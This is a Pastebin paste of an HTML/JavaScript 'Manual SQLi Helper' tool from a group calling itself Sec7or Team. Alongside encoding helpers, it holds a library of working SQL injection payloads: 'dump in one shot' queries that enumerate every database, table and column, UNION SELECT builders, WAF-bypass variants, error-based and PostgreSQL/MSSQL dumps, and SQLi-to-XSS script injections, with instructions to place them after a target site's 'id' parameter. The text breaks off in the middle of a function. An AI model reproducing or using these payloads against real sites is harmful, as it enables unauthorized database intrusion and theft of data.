API tools faq
paste
Advertisement
Versailles

Manual SQLi Helper Sec7or Team

Versailles
Jan 30th, 2016
1,983
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 37.96 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <head>
  3. <title>#Sec7or Team Tools</title>
  4. <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
  5. <meta content='index, follow' name='googlebot'/>
  6. <meta content='all' name='spiders'/>
  7. <meta content='all' name='WEBCRAWLERS'/>
  8. <meta content='Index, Follow' name='robots'/>
  9. <meta content='Versailles' name='author'/>
  10. <meta content='Sec7or Team' name='author'/>
  11.  
  12. <style>
  13. body { padding-top: 60px; background: url(http://img02.deviantart.net/9d9d/i/2010/273/9/b/in_the_snow_by_kitsunebaka91-d2myr0w.jpg) top center no-repeat;
  14. background-attachment:fixed;
  15. }
  16. </style>
  17.  
  18. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.1/css/bootstrap.min.css"> <script src="http://code.jquery.com/jquery-2.1.3.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.1/js/bootstrap.min.js"></script>
  19.  
  20.  
  21.  
  22.  
  23. <script type="text/javascript">
  24.  
  25. // CheatSheet Dios Collection Pakage
  26. // By Versailles
  27. // FB : facebook.com/thever.sevenfoldism
  28. // Dont Change Copyright
  29.  
  30.  
  31. function rplc(){
  32.  
  33. function replaceAll(str, find, replace) { return str.replace(new RegExp(find, 'g'), replace); }
  34.  
  35. var str = document.getElementById('str').value;
  36. var wrd = document.getElementById('wrd').value;
  37. var rep = document.getElementById('rep').value;
  38.  
  39. hasil = replaceAll(str,wrd,rep);
  40. document.getElementById('hex').value = hasil;
  41.  
  42. }
  43.  
  44.  
  45.       var encN=1;
  46.       function decodeTxt(s){
  47.       var s1=unescape(s.substr(0,s.length-1));
  48.       var t='';
  49.       for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
  50.      return unescape(t);
  51.      }
  52.  
  53.      function encodeTxt(s){
  54.      s=escape(s);
  55.      var ta=new Array();
  56.      for(i=0;i<s.length;i++)ta[i]=s.charCodeAt(i)+encN;
  57.      return ""+escape(eval("String.fromCharCode("+ta+")"))+encN;
  58.      }
  59.  
  60.      function escapeTxt(os){
  61.      var ns='';
  62.      var t;
  63.      var chr='';
  64.      var cc='';
  65.      var tn='';
  66.      for(i=0;i<256;i++){
  67.      tn=i.toString(16);
  68.      if(tn.length<2)tn="0"+tn;
  69.      cc+=tn;
  70.      chr+=unescape('%'+tn);
  71.      }
  72.      cc=cc.toUpperCase();
  73.      os.replace(String.fromCharCode(13)+'',"%13");
  74.      for(q=0;q<os.length;q++){
  75.      t=os.substr(q,1);
  76.      for(i=0;i<chr.length;i++){
  77.      if(t==chr.substr(i,1)){
  78.      t=t.replace(chr.substr(i,1),"%"+cc.substr(i*2,2));
  79.      i=chr.length;
  80.      }}
  81.      ns+=t;
  82.      }
  83.      return ns;
  84.      }
  85.      function unescapeTxt(s){
  86.      return unescape(s);
  87.      }
  88.      function wF(s){
  89.      document.write(decodeTxt(s));
  90.      }
  91.  
  92. function esc(){
  93. var str = document.getElementById('str').value;
  94. hasil = escapeTxt(str);
  95. document.getElementById('hex').value = hasil;
  96. }
  97.  
  98.  
  99. function unesc(){
  100. var str = document.getElementById('str').value;
  101. hasil = unescapeTxt(str);
  102. document.getElementById('hex').value = hasil;
  103. }
  104.  
  105. var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  106. var base64DecodeChars = new Array(
  107.    -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
  108.    -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
  109.    -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
  110.    52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1,
  111.    -1,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14,
  112.    15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1,
  113.    -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
  114.    41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);
  115.  
  116. function base64encode(str) {
  117.    var out, i, len;
  118.    var c1, c2, c3;
  119.  
  120.    len = str.length;
  121.    i = 0;
  122.    out = "";
  123.    while(i < len) {
  124.    c1 = str.charCodeAt(i++) & 0xff;
  125.    if(i == len)
  126.    {
  127.        out += base64EncodeChars.charAt(c1 >> 2);
  128.         out += base64EncodeChars.charAt((c1 & 0x3) << 4);
  129.         out += "==";
  130.         break;
  131.     }
  132.     c2 = str.charCodeAt(i++);
  133.     if(i == len)
  134.     {
  135.         out += base64EncodeChars.charAt(c1 >> 2);
  136.         out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
  137.         out += base64EncodeChars.charAt((c2 & 0xF) << 2);
  138.         out += "=";
  139.         break;
  140.     }
  141.     c3 = str.charCodeAt(i++);
  142.     out += base64EncodeChars.charAt(c1 >> 2);
  143.     out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
  144.     out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >>6));
  145.     out += base64EncodeChars.charAt(c3 & 0x3F);
  146.     }
  147.     return out;
  148. }
  149.  
  150. function base64decode(str) {
  151.     var c1, c2, c3, c4;
  152.     var i, len, out;
  153.  
  154.     len = str.length;
  155.     i = 0;
  156.     out = "";
  157.     while(i < len) {
  158.    /* c1 */
  159.    do {
  160.        c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
  161.    } while(i < len && c1 == -1);
  162.    if(c1 == -1)
  163.        break;
  164.  
  165.    /* c2 */
  166.    do {
  167.        c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
  168.    } while(i < len && c2 == -1);
  169.    if(c2 == -1)
  170.        break;
  171.  
  172.    out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
  173.  
  174.     /* c3 */
  175.     do {
  176.         c3 = str.charCodeAt(i++) & 0xff;
  177.         if(c3 == 61)
  178.         return out;
  179.         c3 = base64DecodeChars[c3];
  180.     } while(i < len && c3 == -1);
  181.    if(c3 == -1)
  182.        break;
  183.  
  184.    out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));
  185.  
  186.     /* c4 */
  187.     do {
  188.         c4 = str.charCodeAt(i++) & 0xff;
  189.         if(c4 == 61)
  190.         return out;
  191.         c4 = base64DecodeChars[c4];
  192.     } while(i < len && c4 == -1);
  193.    if(c4 == -1)
  194.        break;
  195.    out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
  196.    }
  197.    return out;
  198. }
  199.  
  200. function utf16to8(str) {
  201.    var out, i, len, c;
  202.  
  203.    out = "";
  204.    len = str.length;
  205.    for(i = 0; i < len; i++) {
  206.    c = str.charCodeAt(i);
  207.    if ((c >= 0x0001) && (c <= 0x007F)) {
  208.        out += str.charAt(i);
  209.     } else if (c > 0x07FF) {
  210.         out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
  211.         out += String.fromCharCode(0x80 | ((c >>  6) & 0x3F));
  212.         out += String.fromCharCode(0x80 | ((c >>  0) & 0x3F));
  213.     } else {
  214.         out += String.fromCharCode(0xC0 | ((c >>  6) & 0x1F));
  215.         out += String.fromCharCode(0x80 | ((c >>  0) & 0x3F));
  216.     }
  217.     }
  218.     return out;
  219. }
  220.  
  221. function utf8to16(str) {
  222.     var out, i, len, c;
  223.     var char2, char3;
  224.  
  225.     out = "";
  226.     len = str.length;
  227.     i = 0;
  228.     while(i < len) {
  229.    c = str.charCodeAt(i++);
  230.    switch(c >> 4)
  231.     {
  232.       case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
  233.         // 0xxxxxxx
  234.         out += str.charAt(i-1);
  235.         break;
  236.       case 12: case 13:
  237.         // 110x xxxx   10xx xxxx
  238.         char2 = str.charCodeAt(i++);
  239.         out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
  240.         break;
  241.       case 14:
  242.         // 1110 xxxx  10xx xxxx  10xx xxxx
  243.         char2 = str.charCodeAt(i++);
  244.         char3 = str.charCodeAt(i++);
  245.         out += String.fromCharCode(((c & 0x0F) << 12) |
  246.                       ((char2 & 0x3F) << 6) |
  247.                       ((char3 & 0x3F) << 0));
  248.         break;
  249.     }
  250.     }
  251.  
  252.     return out;
  253. }
  254.  
  255. function CharToHex(str) {
  256.     var out, i, len, c, h;
  257.  
  258.     out = "";
  259.     len = str.length;
  260.     i = 0;
  261.     while(i < len)
  262.    {
  263.         c = str.charCodeAt(i++);
  264.         h = c.toString(16);
  265.         if(h.length < 2)
  266.             h = "0" + h;
  267.        
  268.         out += "\\x" + h + " ";
  269.         if(i > 0 && i % 8 == 0)
  270.             out += "\r\n";
  271.     }
  272.  
  273.     return out;
  274. }
  275.  
  276. function b64_enc() {
  277.     var str = document.getElementById('str').value;
  278.     document.getElementById('hex').value = base64encode(utf16to8(str));
  279. }
  280.  
  281. function b64_dec() {
  282.     var str = document.getElementById('str').value;
  283.     var opts = "checked";
  284.  
  285.     if(opts.checked)
  286.     {
  287.         document.getElementById('hex').value = CharToHex(base64decode(str));
  288.     }
  289.     else
  290.     {
  291.         document.getElementById('hex').value = utf8to16(base64decode(str));
  292.     }
  293. }
  294.  
  295.  
  296.  
  297. function d2h(d) {return d.toString(16);}
  298. function Str2Hex() {
  299. var tmp = document.getElementById('str').value;
  300. var str = '';
  301. for (var i=0; i<tmp.length; i++) {
  302. c = tmp.charCodeAt(i);
  303. str += d2h(c) + ''; }
  304. document.getElementById('hex').value = str; }
  305.  
  306. function h2d(h) {
  307. return parseInt( h, 16 ); }
  308. function Hex2Str(){
  309.          var string = document.getElementById('str').value;        
  310.         var string = string.toLowerCase();
  311.         string = string.replace( /%/g, '' );
  312.         string = string.replace( /[^0-9abcdefg]/g, '' );
  313.  
  314.         var charStringArray = new Array();
  315.         var buffer = '';
  316.         var hasil = '';
  317.         for ( var c = 0 ; c < string.length ; c++ ) {
  318.           buffer += string.charAt( c ).toString();
  319.           if ( buffer.length >= 2 ) {
  320.             hasil += String.fromCharCode( h2d( buffer ) );
  321.             buffer = '';
  322.           }
  323.         }          
  324. document.getElementById('hex').value = hasil;          
  325.     }
  326.  
  327.  
  328.  
  329. function kolom() {
  330.  
  331. var columns = prompt( "Total Columns ?", "48" );
  332.     columns = Math.min(1000, parseInt( columns ));
  333.     var colArray = new Array();
  334.     for ( var i = 0 ; i < columns ; i++ ) {
  335.      colArray.push( i+1 );
  336.    }
  337.    var kolom = "+UNION+SELECT+" + colArray.join( ',' ); document.getElementById('dios').value = kolom;
  338.  }
  339.  
  340. function dios1(){
  341. var dios1 = '(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)';
  342. document.getElementById('dios').value = dios1;
  343. }
  344.  
  345. function dios2(){
  346. var dios2 = '(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)))';
  347. document.getElementById('dios').value = dios2;
  348. }
  349.  
  350. function dios3(){
  351. var dios3 = 'make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)';
  352. document.getElementById('dios').value = dios3;
  353. }
  354.  
  355. function dios4(){
  356. var dios4 = "export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2)";
  357. document.getElementById('dios').value = dios4;
  358. }
  359.  
  360.  
  361. function xssdios(){
  362. var xssdios = 'concat(0x3c2f6469763e3c7363726970743e616c6572742827,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x5c6e,table_name,0x203a3a20,column_name))))x),0x27293c2f7363726970743e)';
  363. document.getElementById('dios').value = xssdios;
  364. }
  365.  
  366.  
  367. function makman(){
  368. var makman = alert("SQLIGODS SYNTAX V 1.0 \n\nBY MAKMAN");
  369. var makman = "concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b7265703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c307833633266363636663665373433653363363237323365346537353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c656374202840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c307833633733363337323639373037343365373137353635373237393364323232323362363636663732323836393364333133623639336336333666366336333665373433623639326232623239376237313735363537323739336437313735363537323739326236333666366336653631366436353562363935643262323232633330373833323330333336313333363133323330326332323362376437353732366333643735373236633265373236353730366336313633363532383232323732323263323232353332333732323239336236343664373037313735363537323739336437353732366332653732363537303663363136333635323832323664363136623664363136653232326332323238373336353663363536333734323834303239323036363732366636643238373336353663363536333734323834303361336433303738333033303239323032633238373336353663363536333734323032383430323932303636373236663664323832323262363436323262323232653232326237343632366332623232323937373638363537323635323834303239323036393665323032383430336133643633366636653633363137343566373737333238333037383332333032633430326332323262373137353635373237393262323233303738333336333336333233373332333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)";
  370. document.getElementById('dios').value = makman;
  371. }
  372.  
  373. function trjn(){
  374. var trjn = 'concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e,if((@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,2,0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/';
  375. document.getElementById('dios').value = trjn;
  376. }
  377.  
  378. function trjnx(){
  379. var trjnx = "concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)";
  380. document.getElementById('dios').value = trjnx;
  381. }
  382.  
  383. function bypsfrm(){
  384. var bypsfrm = alert("Put after parameter id , and Replace Vuln Column With @sec7or");
  385. var bypsfrm = '+and@sec7or:=concat(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x203a3a20,column_name)),@)+/*!50000UNION*/+SELECT+';
  386. document.getElementById('dios').value = bypsfrm;
  387. }
  388.  
  389. function ebf(){
  390. var ebf = "(SELECT!x-~0.FROM(SELECT(concat_ws(0x3a3a,user(),@@version,database(),concat(@:=0,(Select+count(*)from+information_schema.tables+where+table_schema=database()and@:=concat(@,0x0b,table_name)),@)))x)a)";
  391. document.getElementById('dios').value = ebf;
  392. }
  393.  
  394. function poligon(){
  395. var poligon = "polygon((Select*from((SELECT(!x-~0)FROM(SELECT(concat_ws(0x203a3a20,user(),@@version,database(),(Select+group_concat(table_name+separator+0x0b)from+information_schema.tables+where+table_schema=database())))x)a)b)))";
  396. document.getElementById('dios').value = poligon;
  397. }
  398.  
  399. function multipoint(){
  400. var multipoint = alert("It is only for mysql < 5.5 \n\nHow To Use\n\n1.remove parameter id and change it with the query \nif there s still any table that doesnt show completely just increase the limit ,number 20 in limit 1,20 is our assumption how many tables there in the site..\n\nM@db100d");
  401. var multipoint = "multipoint((select*from(select!x-~0.from(select(select+group_concat(table_name+separator+0x0b)from(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+1,20)c)x)j)h))";
  402. document.getElementById('dios').value = multipoint;
  403. }
  405. function postgre(){
  406. var postgre = "(select+string_agg(concat(table_name,'::',column_name),$$<li>$$)from+information_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$))";
  407. document.getElementById('dios').value = postgre;
  408. }
  409.  
  410. function mssql(){
  411. var mssql = "(select+concat(' ',table_name,'::',column_name)from+information_schema.columns+for+xml+path(''))";
  412. document.getElementById('dios').value = mssql;
  413. }
  414.  
  415. function bof(){
  416. var bof = "+and(SELECT+1)=(SELECT+0x41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)/*!50000UNION*/SELECT+";
  417. document.getElementById('dios').value = bof;
  418.  
  419. }
  420.  
  421.  
  422. function version1(){
  423. var v1 = 'version()';
  424. document.getElementById('dios').value = v1;
  425. }
  426.  
  427. function version2(){
  428. var v2 = '@@version';
  429. document.getElementById('dios').value = v2;
  430. }
  431.  
  432. function version3(){
  433. var v3 = '@@GLOBAL.VERSION';
  434. document.getElementById('dios').value = v3;
  435. }
  436.  
  437. function version4(){
  438. var v4 = "(select+variable_value+from+information_schema.session_variables+where+variable_name+like+0x56455253494f4e)";
  439. document.getElementById('dios').value = v4;
  440. }
  441.  
  442. function version5(){
  443. var v5 = "(Select+variable_value+from+information_schema.global_variables+where+variable_name=0x76657273696f6e)";
  444. document.getElementById('dios').value = v5;
  445. }
  446.  
  447. function user1(){
  448. var u1 = 'user()';
  449. document.getElementById('dios').value = u1;
  450. }
  451.  
  452. function user2(){
  453. var u2 = 'CURRENT_USER()';
  454. document.getElementById('dios').value = u2;
  455. }
  456.  
  457. function user3(){
  458. var u3 = 'SYSTEM_USER()';
  459. document.getElementById('dios').value = u3;
  460. }
  461.  
  462. function user4(){
  463. var u4 = 'SESSION_USER()';
  464. document.getElementById('dios').value = u4;
  465. }
  466.  
  467. function user5(){
  468. var u5 = 'SUBSTRING_INDEX(USER(),0x40,1)';
  469. document.getElementById('dios').value = u5;
  470. }
  471.  
  472. function user6(){
  473. var u6 = '(SELECT+CONCAT(USER)+FROM+INFORMATION_SCHEMA.PROCESSLIST)';
  474. document.getElementById('dios').value = u6;
  475. }
  476.  
  477. function db1(){
  478. var d1 = 'DATABASE()';
  479. document.getElementById('dios').value = d1;
  480. }
  481.  
  482. function db2(){
  483. var d2 = 'SCHEMA()';
  484. document.getElementById('dios').value = d2;
  485. }
  486.  
  487. function db3(){
  488. var d3 = '(SELECT+CONCAT(DB)+FROM+INFORMATION_SCHEMA.PROCESSLIST)';
  489. document.getElementById('dios').value = d3;
  490. }
  491.  
  492. function o1(){
  493. var o1 = '@@HOSTNAME';
  494. document.getElementById('dios').value = o1;
  495. }
  496.  
  497. function o2(){
  498. var o2 = '@@VERSION_COMPILE_MACHINE';
  499. document.getElementById('dios').value = o2;
  500. }
  501.  
  502. function o3(){
  503. var o3 = '@@VERSION_COMPILE_OS';
  504. document.getElementById('dios').value = o3;
  505. }
  506.  
  507. function o4(){
  508. var o4 = '@@BASEDIR';
  509. document.getElementById('dios').value = o4;
  510. }
  511.  
  512. function o5(){
  513. var o5 = '@@HAVE_OPENSSL';
  514. document.getElementById('dios').value = o5;
  515. }
  516.  
  517. function o6(){
  518. var o6 = '@@HAVE_SYMLINK';
  519. document.getElementById('dios').value = o6;
  520. }
  521.  
  522. function o7(){
  523. var o7 = '@@PORT';
  524. document.getElementById('dios').value = o7;
  525. }
  526.  
  527. function o8(){
  528. var o8 = '@@SOCKET';
  529. document.getElementById('dios').value = o8;
  530. }
  531.  
  532. function xssqli(){
  533. var xssqli = prompt('Input Your Query','VERSION()');
  534. var xssqli = "concat(0x3c2f6469763e3c7363726970743e616c6572742827,"+xssqli+",0x27293c2f7363726970743e)";
  535. document.getElementById('dios').value = xssqli;
  536. }
  537.  
  538. function mydios(){
